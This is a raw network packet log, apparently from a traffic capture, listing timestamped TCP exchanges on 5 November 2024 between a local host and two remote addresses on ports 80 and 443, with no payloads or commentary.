Nov 5, 2024 18:46:09.713166952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713174105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713185072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713197947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713217974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713221073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713227034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713260889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713301897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713311911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713320971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713330984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713337898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713344097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713367939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713395119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713404894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713416100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713424921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713445902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713471889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713615894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713653088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713670969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713680983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713707924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713718891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713766098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713778019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713787079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713793993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713804007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713805914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713814974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713824987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713835955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713845015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713845968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713872910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713896990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713943958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713953018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713958025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.713988066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.713994980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714006901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714008093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714026928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714035034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714044094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714056969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714066982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714067936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714083910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714093924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714097023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714106083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714131117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714168072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714178085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714186907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714200974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714226007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714266062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714278936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714291096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714301109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714308977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714328051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714351892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714376926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714385986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714394093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714405060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714409113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714416027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714426041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714428902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714452028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714471102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714771986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714783907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714793921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.714811087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714822054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.714839935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.730350018 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.730375051 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.730436087 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.730439901 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.730483055 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.730696917 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.730715990 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.730726004 CET	49816	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.730731010 CET	443	49816	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.733566999 CET	49821	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.733594894 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.733661890 CET	49821	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.733805895 CET	49821	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.733819962 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.763616085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.763648033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.763674021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.763685942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.763703108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.763834000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.763834000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.810653925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810682058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810695887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810704947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810712099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810717106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810728073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810856104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810866117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810873985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.810874939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.810875893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810888052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810897112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810900927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.810904980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.810906887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810954094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.810976028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.810992956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811002970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811014891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811042070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811070919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811083078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811093092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811115026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811115026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811130047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811141968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811144114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811151981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811161995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811168909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811176062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811182976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811182976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811214924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811382055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811392069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811403036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811419010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811448097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811467886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811479092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811489105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811497927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811507940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811515093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811528921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811547995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811567068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811583042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811599970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811605930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811610937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811619043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811619043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.811630964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811652899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.811652899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812334061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812342882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812352896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812374115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812387943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812402010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812402964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812412024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812427998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812427998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812448978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812551022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812567949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812577963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812592983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812603951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812609911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812650919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812663078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812700987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812796116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812805891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812817097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812840939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812860966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812865973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812876940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812886953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812896013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812906027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812910080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812916994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812927961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.812931061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812939882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812957048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.812994957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813005924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813014984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813039064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813047886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813229084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813239098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813273907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813632011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813642025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813651085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813677073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813694954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813697100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813709021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813718081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813728094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813736916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813745975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813752890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813834906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813853025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813863039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813874006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813880920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813884974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813894987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813905001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813905001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.813925982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813931942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.813955069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.814704895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.814743996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.814759970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.814770937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.814805031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.814832926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.814845085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.814853907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.814863920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.814866066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.814893007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.814903021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815068960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815078020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815115929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815144062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815154076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815165043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815174103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815186977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815188885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815205097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815208912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815217972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815224886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815227985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815237999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815239906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815248013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815253973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815260887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815283060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815290928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815300941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815320015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815321922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815335035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815345049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815351963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815352917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815365076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815368891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815380096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815387964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815397978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815407991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815429926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815457106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815480947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815498114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815509081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815516949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815526009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815529108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815534115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815571070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815588951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815591097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815601110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815632105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815670013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815680981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815690041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815697908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.815711975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815723896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.815763950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.830744028 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.831433058 CET	49817	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.831450939 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.831932068 CET	49817	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.831938028 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.832365990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832377911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832391977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832417011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832429886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832441092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832451105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832451105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832463026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832475901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832510948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832546949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832557917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832567930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832577944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832588911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832591057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832619905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832643032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832662106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832672119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832685947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832705021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832705021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832721949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832741976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832752943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832770109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832781076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832787991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832792044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832798004 CET	80	49804	31.41.244.11	192.168.2.4
